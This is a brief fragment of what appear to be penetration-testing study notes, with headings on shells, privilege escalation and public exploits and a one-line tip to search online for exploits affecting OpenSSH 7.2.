Shells and Privilege Escalation

Public Exploits

Google
A simple search: openssh 7.2 exploit